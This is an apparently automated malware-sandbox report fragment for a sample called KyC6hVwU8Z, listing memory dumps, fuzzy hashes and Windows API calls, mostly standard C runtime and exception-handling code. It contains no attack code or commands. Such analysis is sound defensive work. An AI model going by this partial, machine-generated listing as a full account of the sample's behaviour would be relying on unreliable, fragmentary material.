                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ___except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3493665558-3733052814
                                                              • Opcode ID: 213d7425d84640b4298180d6770058ac37cf87002bf707635e688a450808493e
                                                              • Instruction ID: 9f2d642420871e1a6dd93d231a555c783efac28036c81bd0bf779cbd4644c196
                                                              • Opcode Fuzzy Hash: 213d7425d84640b4298180d6770058ac37cf87002bf707635e688a450808493e
                                                              • Instruction Fuzzy Hash: 5631D17240021DDBCF268F94DE848BABB76FF09315B18855AFA5849122D332DCA1EBC1
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001F55D3
                                                              • ___raise_securityfailure.LIBCMT ref: 001F56BB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                              • String ID: E!
                                                              • API String ID: 3761405300-107689196
                                                              • Opcode ID: 908abb6f71459b64a90750780b2ab63d7c38c05408fb0b8e0d415393145eece0
                                                              • Instruction ID: deacf76a3bd23547dc13c7796ed6b05f6a1823af45ab754a53bc19cdaa4943f3
                                                              • Opcode Fuzzy Hash: 908abb6f71459b64a90750780b2ab63d7c38c05408fb0b8e0d415393145eece0
                                                              • Instruction Fuzzy Hash: 9A21E4B4501344EBD710EF55F889A947BEABB7A719F50C12AEA0CCB3A0EBB055418F48
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f3b0bfaf6c681b77f1afa7df557740fb38ccb51464f386d81a31fc5b04ad2319
                                                              • Instruction ID: 3e69fae480c60aa2e7d70d807f09151554c6c735bd59f22a02390be55f2b9f2b
                                                              • Opcode Fuzzy Hash: f3b0bfaf6c681b77f1afa7df557740fb38ccb51464f386d81a31fc5b04ad2319
                                                              • Instruction Fuzzy Hash: 39024B71E1121A9FDF14CFA8C8846AEFBF5FF48314F248269D919A7381D731A925CB90
                                                              APIs
                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00200E38
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID:
                                                              • API String ID: 1974802433-0
                                                              • Opcode ID: acd33c4ca5bc5244fbebe5c532047a9fe7696cbf3dd01d8fe843e123faa24f68
                                                              • Instruction ID: 05451e26d474e5ab953a184d417ab11aae2ab2df8cc3301285755cee38d8efee
                                                              • Opcode Fuzzy Hash: acd33c4ca5bc5244fbebe5c532047a9fe7696cbf3dd01d8fe843e123faa24f68
                                                              • Instruction Fuzzy Hash: 2371D27191525AAFEF309F64CCCDBFAB7B8EB05300F1441D9E008A7292DA315E919F10
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001F60B0
                                                              • IsDebuggerPresent.KERNEL32 ref: 001F617C
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001F619C
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 001F61A6
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: 61883a0190a7cd3a51e2ff948fd2f8d7022afc5d5ab142a59197b5a51afeec1c
                                                              • Instruction ID: fbc2f81273c69fb6a3e25d6716a7a0e47aecfc4294888835dd163eeefcb0b247
                                                              • Opcode Fuzzy Hash: 61883a0190a7cd3a51e2ff948fd2f8d7022afc5d5ab142a59197b5a51afeec1c
                                                              • Instruction Fuzzy Hash: 60313875D0531CDBDB20DFA0D989BDDBBB8AF18300F1041EAE50CAB250EB715A858F44
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 001F57F6
                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 001F5804
                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 001F5815
                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 001F5826
                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 001F5837
                                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 001F5848
                                                              • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 001F5859
                                                              • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 001F586A
                                                              • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 001F587B
                                                              • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 001F588C
                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 001F589D
                                                              • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 001F58AE
                                                              • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 001F58BF
                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 001F58D0
                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 001F58E1
                                                              • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 001F58F2
                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 001F5903
                                                              • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 001F5914
                                                              • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 001F5925
                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 001F5936
                                                              • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 001F5947
                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 001F5958
                                                              • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 001F5969
                                                              • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 001F597A
                                                              • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 001F598B
                                                              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 001F599C
                                                              • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001F59AD
                                                              • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 001F59BE
                                                              • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001F59CF
                                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001F59E0
                                                              • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 001F59F1
                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 001F5A02
                                                              • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 001F5A13
                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 001F5A24
                                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 001F5A35
                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 001F5A46
                                                              • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 001F5A57
                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 001F5A68
                                                              • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 001F5A79
                                                              • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 001F5A8A
                                                              • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 001F5A9B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                              • API String ID: 667068680-295688737
                                                              • Opcode ID: c5e8f5931bd7d02683fe6b3fa747080c7a6bc5a90675df42fbea3c5a025f73ef
                                                              • Instruction ID: f08b39d44b798feba2c81a9cd5a51bd6dae3adb92255ad0bb0b99dd40412bdc6
                                                              • Opcode Fuzzy Hash: c5e8f5931bd7d02683fe6b3fa747080c7a6bc5a90675df42fbea3c5a025f73ef
                                                              • Instruction Fuzzy Hash: 39616971DE2310AFCB50AFB4BD1D8DA3AA8BE2A741345852AB605D2DF5DFB84021CF54
                                                              APIs
                                                              • type_info::operator==.LIBVCRUNTIME ref: 001FC5D2
                                                              • ___TypeMatch.LIBVCRUNTIME ref: 001FC6E0
                                                              • CatchIt.LIBVCRUNTIME ref: 001FC731
                                                              • _UnwindNestedFrames.LIBCMT ref: 001FC832
                                                              • CallUnexpected.LIBVCRUNTIME ref: 001FC84D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 4119006552-393685449
                                                              • Opcode ID: 54683e2caaae89dd80156433bb8a9fcd3f23b083b4c7bdf20d9233f4771cdd69
                                                              • Instruction ID: 25a0ef0b1cbac862983ce0e4f67564a3fd47f79d8f798d11232660d36054a530
                                                              • Opcode Fuzzy Hash: 54683e2caaae89dd80156433bb8a9fcd3f23b083b4c7bdf20d9233f4771cdd69
                                                              • Instruction Fuzzy Hash: 3AB1697190020DDFCF19EFA4CA818BEB7B5BF24310B15415AEA15AB212D731EA51EFD1
                                                              APIs
                                                                • Part of subcall function 00207DAC: CreateFileW.KERNEL32(00000000,00000000,?,00207A50,?,?,00000000,?,00207A50,00000000,0000000C), ref: 00207DC9
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00207ABB
                                                              • __dosmaperr.LIBCMT ref: 00207AC2
                                                              • GetFileType.KERNEL32(00000000), ref: 00207ACE
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00207AD8
                                                              • __dosmaperr.LIBCMT ref: 00207AE1
                                                              • CloseHandle.KERNEL32(00000000), ref: 00207B01
                                                              • CloseHandle.KERNEL32(002025EE), ref: 00207C4E
                                                              • GetLastError.KERNEL32 ref: 00207C80
                                                              • __dosmaperr.LIBCMT ref: 00207C87
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                              • String ID:
                                                              • API String ID: 4237864984-0
                                                              • Opcode ID: 700253cd6516ee78958451a2b0f8de45071aefd31c12ddaa6187211ab08dfa80
                                                              • Instruction ID: 93ee4bdbff8a37cd44219a0a3bc169a8b127319e27946e9d676d41fe54a8a835
                                                              • Opcode Fuzzy Hash: 700253cd6516ee78958451a2b0f8de45071aefd31c12ddaa6187211ab08dfa80
                                                              • Instruction Fuzzy Hash: D7A14A32E282199FCF199F68EC56BAD3BA1AB16310F14415DF805AF3D2DB349C22CB51
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: _strrchr
                                                              • String ID:
                                                              • API String ID: 3213747228-0
                                                              • Opcode ID: 41285e77cb004f04a8fd11cd2fb887af5f9d7ae8ca7e119b6c9aa78753bf9a57
                                                              • Instruction ID: db7af3ffaa2864fdacddf8817f7fa2821f46a182bbe8d5175e1a0e76647953f3
                                                              • Opcode Fuzzy Hash: 41285e77cb004f04a8fd11cd2fb887af5f9d7ae8ca7e119b6c9aa78753bf9a57
                                                              • Instruction Fuzzy Hash: FAB14972900359AFDB15CF68CC81BBEBBA5EF55354F154179EA04AB382D3F49902CBA0
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 001F6DB7
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 001F6DBF
                                                              • _ValidateLocalCookies.LIBCMT ref: 001F6E48
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 001F6E73
                                                              • _ValidateLocalCookies.LIBCMT ref: 001F6EC8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: c62f9e9122b1c2ebcaac31c6505c49e41ca9c4fea53942c89b16c0c0c5b9e984
                                                              • Instruction ID: 386b84db76b0e3060bf291177a7fb5e89a76fe3228eda055d84f1a85e8a8af5b
                                                              • Opcode Fuzzy Hash: c62f9e9122b1c2ebcaac31c6505c49e41ca9c4fea53942c89b16c0c0c5b9e984
                                                              • Instruction Fuzzy Hash: 0F41A239A0020CEBCF10DFA8C885AAEBBB5BF45314F148155EA199B393D731AE15CBD1
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,001FD219,?,9C2BD565,00000000,9C2BD565,?,?,001FCFCB,00000022,FlsSetValue,0020BED0,0020BED8,9C2BD565), ref: 001FD1CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3664257935-537541572
                                                              • Opcode ID: 7e7479f29bae8e14a6c7101f7043941f39fdf68363cd6439045a0f5eb1d7ea46
                                                              • Instruction ID: 7488d96b280fea4a723fe95e9268b088bee20c3dcd11bc95020d54c705dd312c
                                                              • Opcode Fuzzy Hash: 7e7479f29bae8e14a6c7101f7043941f39fdf68363cd6439045a0f5eb1d7ea46
                                                              • Instruction Fuzzy Hash: 9A21DA72A05315ABD731AB24FC89BBA376AAB527A0F264110FF15A7291DB30ED11C7D0
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc6f44d4a0c35a7a9419588a441cf8e4d5cf5fb262e721d1bfc5b3a1f5862e29
                                                              • Instruction ID: 15553fdd27fae41e34246ac9e96d825d5c9e1cc609f4889cd08d691f0a80e8bc
                                                              • Opcode Fuzzy Hash: dc6f44d4a0c35a7a9419588a441cf8e4d5cf5fb262e721d1bfc5b3a1f5862e29
                                                              • Instruction Fuzzy Hash: B0B12370A2430AEFDB11DF98D889BBD7BB4AF59340F14414AE909973D3CB70A966CB50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: __freea$Info
                                                              • String ID:
                                                              • API String ID: 541289543-0
                                                              • Opcode ID: 8b832d1d506d2df978fec610bfb98906d91ffba3e884a59f02aa077738e1105a
                                                              • Instruction ID: ae668b53a803f4ffc2ea79357f5d6b578497e5fd8cc0e79f213e8add3383fbf7
                                                              • Opcode Fuzzy Hash: 8b832d1d506d2df978fec610bfb98906d91ffba3e884a59f02aa077738e1105a
                                                              • Instruction Fuzzy Hash: B1712A32A24307ABDF209F648C89BEFB7BA9F49310F580055E959A72C3DB359C60CB50
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,001FBC0A,001F6B5D,001F6204), ref: 001FBC21
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001FBC2F
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001FBC48
                                                              • SetLastError.KERNEL32(00000000,001FBC0A,001F6B5D,001F6204), ref: 001FBC9A
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 8e7d3a81e70e40e49b9a895cd0701c3a84a9d73d3c502c2c36b15bed2960a821
                                                              • Instruction ID: ae2a8d38c5f8b7b920137b5d1c4a7f10f6e524f565cc4d4adfabdc587c5fa47b
                                                              • Opcode Fuzzy Hash: 8e7d3a81e70e40e49b9a895cd0701c3a84a9d73d3c502c2c36b15bed2960a821
                                                              • Instruction Fuzzy Hash: 0301473621D31EAEE7246B78FCC95B72B4DEB22334320422AF314451F2EF518D119954
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,9C2BD565,?,00000000,0020ADB8,000000FF,?,001F984F,001F9736,?,001F98EB,00000000), ref: 001F97C3
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00000000,0020ADB8,000000FF,?,001F984F,001F9736,?,001F98EB,00000000), ref: 001F97D5
                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,0020ADB8,000000FF,?,001F984F,001F9736,?,001F98EB,00000000), ref: 001F97F7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2787465077.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000005.00000002.2787447126.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787519908.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787546531.0000000000213000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787561928.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2787588109.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: d863c17a7906f23674dcf5d109af431559743567f4076b92d989f4d9d1f8fda6
                                                              • Instruction ID: fbd74b4915c671373563b4475a829908d30f4deb52521b1aacac569b045fbef9
                                                              • Opcode Fuzzy Hash: d863c17a7906f23674dcf5d109af431559743567f4076b92d989f4d9d1f8fda6
                                                              • Instruction Fuzzy Hash: 65018F31A64719AFDB11AF40EC49FEEB7B9FB08B54F004625F911A26D0DBB49910CA80
                                                              APIs
